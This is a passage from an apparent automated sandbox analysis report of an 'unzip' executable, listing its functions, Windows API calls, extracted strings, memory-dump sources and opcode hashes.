\pB, xrefs: 0041488B, 00414AB7

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: mallocstrncmp
String ID: Central directory entry #%lu:---------------------------$%$%lu file%s, %lu bytes uncompressed, %lu bytes compressed: %s%d.%d%%$\pB$`pB$gfff$jre/jre-1.8/lib/deploy/email.js
API String ID: 1726509752-837467692
Opcode ID: dde948c525556e3ad2d35919473f0da70c8e9c0f4fb42c2646605539352728e3
Instruction ID: e999b545f41ff80e792e8f6f93005333b8ce0877611eacee06766283e33e8014
Opcode Fuzzy Hash: dde948c525556e3ad2d35919473f0da70c8e9c0f4fb42c2646605539352728e3
Instruction Fuzzy Hash: BC025EB460A3119BC710AF25D54026FBBE1BBC4348F91892EE8C497351DB7CD882DB9E

Function 004218E0 Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 261stringlibraryfileCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 004218F8
GetProcAddress.KERNEL32 ref: 0042190D
strlen.MSVCRT ref: 00421934
realloc.MSVCRT ref: 0042194C
GetVolumeInformationA.KERNEL32 ref: 0042199D
FreeLibrary.KERNEL32 ref: 004219DC
CreateFileA.KERNEL32 ref: 00421A53
DeviceIoControl.KERNEL32 ref: 00421ABC
CloseHandle.KERNEL32 ref: 00421AC9
_errno.MSVCRT ref: 00421AE7
_stricmp.MSVCRT ref: 00421B6D
strncpy.MSVCRT ref: 00421CDA
strncpy.MSVCRT ref: 00421CF8
strncpy.MSVCRT ref: 00421D19
FreeLibrary.KERNEL32 ref: 00421E64
_errno.MSVCRT ref: 00421E6C

Strings

Z, xrefs: 00421D08
,, xrefs: 00421A85

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Librarystrncpy$Free_errno$AddressCloseControlCreateDeviceFileHandleInformationLoadProcVolume_stricmpreallocstrlen
String ID: ,$Z
API String ID: 826693093-3024109530
Opcode ID: da68d201f1a234e75681789ba851a5281ca46ca78f4e375367a33d605c288e38
Instruction ID: 47f63d6feb86bcc907d30badc8b3633339f442b95958ed3adbbee96d3a9c5b8e
Opcode Fuzzy Hash: da68d201f1a234e75681789ba851a5281ca46ca78f4e375367a33d605c288e38
Instruction Fuzzy Hash: 70C1E0B09087519FD314EF2AD18065BFBE0BF88344F91892EE9D887351E7B99944CF86

Function 00423860 Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 252stringCOMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00423872
strlen.MSVCRT ref: 00423887
_errno.MSVCRT ref: 004238AD
_getpid.MSVCRT ref: 004238E4
_errno.MSVCRT ref: 00423AED
_errno.MSVCRT ref: 00423B2D
_open.MSVCRT ref: 00423BF0

Strings

! "invalid KIND in __gen_tempname", xrefs: 00423C6D
XXXXXX, xrefs: 00423899
>, xrefs: 00423A7D
../../libc-0.5-src/stdio-common/tempname.c, xrefs: 00423C65
invalid KIND in __gen_tempname, xrefs: 00423AD8

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _errno$_getpid_openstrlen
String ID: ! "invalid KIND in __gen_tempname"$../../libc-0.5-src/stdio-common/tempname.c$>$XXXXXX$invalid KIND in __gen_tempname
API String ID: 2818321287-2996519770
Opcode ID: 68b1d8a3637b4dc32f5cb6e7c54494734c7f52175382fb92be21d79e012ba941
Instruction ID: a905e6f8777032f87531b503296a751a455ae7ded3d554d3e51e717c6c06c34a
Opcode Fuzzy Hash: 68b1d8a3637b4dc32f5cb6e7c54494734c7f52175382fb92be21d79e012ba941
Instruction Fuzzy Hash: 6BA149B06097609FD320EF25D48132ABBE1BFC4715F85C96EE4888B351C7BC9945CB96

Function 0041C9D0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0041C9DB
OpenProcessToken.ADVAPI32 ref: 0041C9F3
LookupPrivilegeValueA.ADVAPI32 ref: 0041CA3B
CloseHandle.KERNEL32 ref: 0041CA5C

Strings

(, xrefs: 0041C9EB
SeSecurityPrivilege, xrefs: 0041CA6A

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentHandleLookupOpenPrivilegeTokenValue
String ID: ($SeSecurityPrivilege
API String ID: 2654680240-4130648986
Opcode ID: 35b1b23a526da3731f8ad390f8a56d46b0ecfcc34df50fa91166d517f2f6193c
Instruction ID: c33fcdbb104dfc6a605d45db3915e1cb00170f03650de70f0687b460c6fe58eb
Opcode Fuzzy Hash: 35b1b23a526da3731f8ad390f8a56d46b0ecfcc34df50fa91166d517f2f6193c
Instruction Fuzzy Hash: B331F8B05493118BD300EF25D98535FBBF0AF84788F81C92EE88857341D7B9D9898B8B

Function 0041F460 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 270stringfileCOMMON

Download Yara Rule

APIs

isalpha.MSVCRT ref: 0041F485
FindFirstFileA.KERNEL32 ref: 0041F52A
strcpy.MSVCRT ref: 0041F59C
FindClose.KERNEL32 ref: 0041F5A4
strcpy.MSVCRT ref: 0041F5CB
FindClose.KERNEL32 ref: 0041F5E5
_errno.MSVCRT ref: 0041F5ED
_errno.MSVCRT ref: 0041F5FC

Strings

:, xrefs: 0041F7E0

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Find$Close_errnostrcpy$FileFirstisalpha
String ID: :
API String ID: 906054009-336475711
Opcode ID: 0614f4b93429b9635b369a0250c0629682b1bfee9a3e891ce11759e8b9024086
Instruction ID: ca1ef37c987fbfae8f290b53d294491942844126e52a2447c3f421dec83eb778
Opcode Fuzzy Hash: 0614f4b93429b9635b369a0250c0629682b1bfee9a3e891ce11759e8b9024086
Instruction Fuzzy Hash: 8B91F231A9A7944AEB348E2984543F77BD25B52340F8C493FD8D907393D22C09CF9B5A

Function 0041B000 Relevance: 15.1, APIs: 10, Instructions: 78stringfileCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0041B014
malloc.MSVCRT ref: 0041B022
strlen.MSVCRT ref: 0041B034
malloc.MSVCRT ref: 0041B03F
strcpy.MSVCRT ref: 0041B059
FindFirstFileA.KERNEL32 ref: 0041B096
strcpy.MSVCRT ref: 0041B0B5
free.MSVCRT ref: 0041B0BD
free.MSVCRT ref: 0041B0DD
free.MSVCRT ref: 0041B0F0

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: free$mallocstrcpystrlen$FileFindFirst
String ID:
API String ID: 824393512-0
Opcode ID: 8172627e33946bf6b890a42b0341e783ed10752d437d254a27aa98d4422c5bd4
Instruction ID: f6703e21769a38fb0a084cc09330c6ee2a8345ca1693c997137457c02c6ab434
Opcode Fuzzy Hash: 8172627e33946bf6b890a42b0341e783ed10752d437d254a27aa98d4422c5bd4
Instruction Fuzzy Hash: 46214D70618B149BC721AF3594853BBBAE0EF49344FC5882ED4D94B301E73C94858BDA

Function 0041FD10 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 94libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0041FD28
GetProcAddress.KERNEL32 ref: 0041FD43
GetFileAttributesA.KERNEL32 ref: 0041FD57
FreeLibrary.KERNEL32 ref: 0041FDB4

Strings

KERNEL32.DLL, xrefs: 0041FD21
GetFileAttributesExA, xrefs: 0041FD38

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: AddressAttributesFileFreeHandleLibraryModuleProc
String ID: GetFileAttributesExA$KERNEL32.DLL
API String ID: 2425931871-3490876526
Opcode ID: a777a10c358e847abf4cb68482ee5111157cc1f0bb7f5021a77aa8f23d401d47
Instruction ID: 78e75aebba13ca0824c6b0bb8b53807b18ca1167f86be35e93b2465ef3c68d6e
Opcode Fuzzy Hash: a777a10c358e847abf4cb68482ee5111157cc1f0bb7f5021a77aa8f23d401d47
Instruction Fuzzy Hash: E64112B55083508FC710EF29D08426ABBE4BF88354F058A2EED9947345D734E95ACF86

Function 0041F1B0 Relevance: 12.1, APIs: 8, Instructions: 95comstringCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 0041F1CA
CoCreateInstance.OLE32 ref: 0041F202
AreFileApisANSI.KERNEL32 ref: 0041F239
MultiByteToWideChar.KERNEL32 ref: 0041F26D
lstrcpyA.KERNEL32 ref: 0041F2D8
CoUninitialize.OLE32 ref: 0041F2FE
_errno.MSVCRT ref: 0041F316
CoUninitialize.OLE32 ref: 0041F31D

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Uninitialize$ApisByteCharCreateFileInitializeInstanceMultiWide_errnolstrcpy
String ID:
API String ID: 1401075353-0
Opcode ID: a340ff37cd1eb58e6fe94d60bb2b5eeda57918ed55a20bd7c5503ea693961a17
Instruction ID: fe873aa83967c706c96b3e41bf92baf5cc6a72d38cfbf7a9c4ffc8b73e0e35cd
Opcode Fuzzy Hash: a340ff37cd1eb58e6fe94d60bb2b5eeda57918ed55a20bd7c5503ea693961a17
Instruction Fuzzy Hash: C14117B15083118FC300AF29D58825EBBE5BF84358F418A2EE89857355D778E98ACB97

Function 0041F66C Relevance: 6.1, APIs: 4, Instructions: 98stringfileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32 ref: 0041F52A
strcpy.MSVCRT ref: 0041F59C
FindClose.KERNEL32 ref: 0041F5A4
strcpy.MSVCRT ref: 0041F5CB
FindClose.KERNEL32 ref: 0041F5E5
_errno.MSVCRT ref: 0041F5ED
_errno.MSVCRT ref: 0041F5FC

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Find$Close_errnostrcpy$FileFirst
String ID:
API String ID: 2715726052-0
Opcode ID: 9ee6c054c55eeef8f7261dea9f13cf69c0b8ecc4795945756d1d83d49adf2e69
Instruction ID: e1f5a96acb74b2d4d7e22b0dad3fe58dc0f98562b84974f3503d5b7c31209e85
Opcode Fuzzy Hash: 9ee6c054c55eeef8f7261dea9f13cf69c0b8ecc4795945756d1d83d49adf2e69
Instruction Fuzzy Hash: 1C31D071A497849EEB349E2894843F7B7E1EF91344F4C493ED8D943352D23C698E8B86

Function 00423040 Relevance: 6.0, APIs: 4, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32 ref: 0042305A
GetProcessHeap.KERNEL32 ref: 00423064
HeapAlloc.KERNEL32 ref: 00423078
GetLogicalDriveStringsA.KERNEL32 ref: 00423089

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: DriveHeapLogicalStrings$AllocProcess
String ID:
API String ID: 461270812-0
Opcode ID: 49833fdfb906819ff8c73dce980fd051d71ebdc348d50582d2e4579a209e5942
Instruction ID: 8ad45413d98a683f2a9320d1144ea47dd7c9df114b0d2c8d70e62e6614b5a93e
Opcode Fuzzy Hash: 49833fdfb906819ff8c73dce980fd051d71ebdc348d50582d2e4579a209e5942
Instruction Fuzzy Hash: BCF012B09083208BC300FF39D58530EBEE0AF84744F81486DE8C897302D27899588BA7

Function 00423D10 Relevance: 4.6, APIs: 3, Instructions: 60timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32 ref: 00423D32
GetSystemTimeAsFileTime.KERNEL32 ref: 00423D5F
_errno.MSVCRT ref: 00423DE9

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Time$FileInformationSystemZone_errno
String ID:
API String ID: 466891052-0
Opcode ID: 75d188759490f449af121252d93eb48491cb30d8da180533ad9f70afe4128832
Instruction ID: bb767dd23b358d89278af6d1a908e983a365c04fd4fe65028b43f440b49d1bd6
Opcode Fuzzy Hash: 75d188759490f449af121252d93eb48491cb30d8da180533ad9f70afe4128832
Instruction Fuzzy Hash: 4E2149B59087618BC710EF29E08135FBBF0BF84354F85892EE89957345D77895488B92

Function 0041FDCC Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 0041FDB4
FindFirstFileA.KERNEL32 ref: 0041FDDE
FindClose.KERNEL32 ref: 0041FE33

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Find$CloseFileFirstFreeLibrary
String ID:
API String ID: 2122072202-0
Opcode ID: cecac0d774b81b1ffe942809016ba16030e62314732585f6027ef2a24f3d713e
Instruction ID: 82a050df7604864c2d8adb149cb2c6e1cb338ba904ebaa2c280b0ffa958eef74
Opcode Fuzzy Hash: cecac0d774b81b1ffe942809016ba16030e62314732585f6027ef2a24f3d713e
Instruction Fuzzy Hash: 6F11CFB69083508FCB04AF29E08015AFBF4BF88320F15896EED9957355D235EA55CF86

Function 0041B0F9 Relevance: 4.5, APIs: 3, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32 ref: 0041B096
strcpy.MSVCRT ref: 0041B0B5
free.MSVCRT ref: 0041B0BD
free.MSVCRT ref: 0041B0DD
free.MSVCRT ref: 0041B0F0

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: free$FileFindFirststrcpy
String ID:
API String ID: 390801777-0
Opcode ID: 9c302e147b69da33b0174950a8e3719c527ebb7f3a6b0b723aa1cf78ac433b59
Instruction ID: 5cf4e173eddcb0db409228a1415a13fc80c7bfa068ae23fe9d10a1ed7e126f45
Opcode Fuzzy Hash: 9c302e147b69da33b0174950a8e3719c527ebb7f3a6b0b723aa1cf78ac433b59
Instruction Fuzzy Hash: 70F01D71608B119BC314AF28D4813EAFBE0FF88308F85892EE4D947245E778A4548B96

Function 0041ACD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 0041ACF2

Strings

!, xrefs: 0041ACE3

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: !
API String ID: 2299586839-2657877971
Opcode ID: fe145b6c31c9ec62dda34e091483a9ee3d43483f3f8f670be5032bf90c5750ca
Instruction ID: 5ae18c809a136a6da74c2a4cc8d9f575efc8f9797b14e8faeeef5fa419312cc8
Opcode Fuzzy Hash: fe145b6c31c9ec62dda34e091483a9ee3d43483f3f8f670be5032bf90c5750ca
Instruction Fuzzy Hash: F0E09BB420964049E314AE28D24D3AFBBD3EBC1305F64C81BD88482756D3BCC8E88657

Function 004211D0 Relevance: 3.3, APIs: 2, Instructions: 263COMMON

Download Yara Rule

APIs

Part of subcall function 0041FD10: GetModuleHandleA.KERNEL32 ref: 0041FD28
Part of subcall function 0041FD10: GetProcAddress.KERNEL32 ref: 0041FD43
Part of subcall function 0041FD10: GetFileAttributesA.KERNEL32 ref: 0041FD57
Part of subcall function 0041FD10: FreeLibrary.KERNEL32 ref: 0041FDB4

Part of subcall function 00422230: strlen.MSVCRT ref: 00422258
Part of subcall function 00422230: strlen.MSVCRT ref: 00422273
Part of subcall function 00422230: free.MSVCRT ref: 00422295

GetVolumeInformationA.KERNEL32 ref: 00421303
free.MSVCRT ref: 00421323

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: freestrlen$AddressAttributesFileFreeHandleInformationLibraryModuleProcVolume
String ID:
API String ID: 1387693866-0
Opcode ID: 0df326f0ce83252432419604f2c2970bab64ab39c3ec8dcb1fea4b164a3d5de5
Instruction ID: 2ca194cf55f3b8c4471abfc0dc792269f1624473003eee570196255c7f439388
Opcode Fuzzy Hash: 0df326f0ce83252432419604f2c2970bab64ab39c3ec8dcb1fea4b164a3d5de5
Instruction Fuzzy Hash: A6B1F7B1A097548FD324DF29C48065BFBE2BFC8304F95C92EE9C997345DB74A8458B82

Function 00404F50 Relevance: 2.9, APIs: 2, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5152973423ba36af8c3cb6fedb1727b2f892f274ca6cf1dc8f624e5b8af5e1ec
Instruction ID: cd53efcabae005b73e263ad6c729d11ca9e096e1d526c83d8b3d8c93b47b1ea1
Opcode Fuzzy Hash: 5152973423ba36af8c3cb6fedb1727b2f892f274ca6cf1dc8f624e5b8af5e1ec
Instruction Fuzzy Hash: 7402D131A09B118BC704DF59D48026BF7F1FBC9304F11563EE89967390CB78A9469F9A

Function 00405590 Relevance: 2.9, APIs: 2, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85df971d009acaa80fa7529bb16cde473e7ea6d76c0597bf8e9a9b1a4dc36547
Instruction ID: 980f053cb8d0a66ff88cc5a9e886b64048fefa2ae3c78a7bd930b69fa0ea08e5
Opcode Fuzzy Hash: 85df971d009acaa80fa7529bb16cde473e7ea6d76c0597bf8e9a9b1a4dc36547
Instruction Fuzzy Hash: AFE1D271A09B118BC704DF19D48422BF7F1FBC8314F505A3EE89967380CB78A9469F9A

Function 0041AD30 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 0041AD52

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ff1edc75be6ced4f2d7ee5e1febc478612ce4e8dc7aa02e13928239dd5e587ca
Instruction ID: 2f7ed86c29a9646d5d546a22f5d2d7ea635898e38d312c1ccc9d3099851f23e9
Opcode Fuzzy Hash: ff1edc75be6ced4f2d7ee5e1febc478612ce4e8dc7aa02e13928239dd5e587ca
Instruction Fuzzy Hash: 94E046F060871046E304EE19E0453ABBAE2AB80346F88C94EE9D807A46E2BD85588B57

Function 0041EC0E Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0041DD0C), ref: 0041EC2A

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: d2815fd9227aa9cd0e2f85625343d1debee006fd1c6997a7de5429f44ef90054
Instruction ID: 0b7862928cd502c429d738d56bb38748f35a65c262b5d7e3083e63374e21c580
Opcode Fuzzy Hash: d2815fd9227aa9cd0e2f85625343d1debee006fd1c6997a7de5429f44ef90054
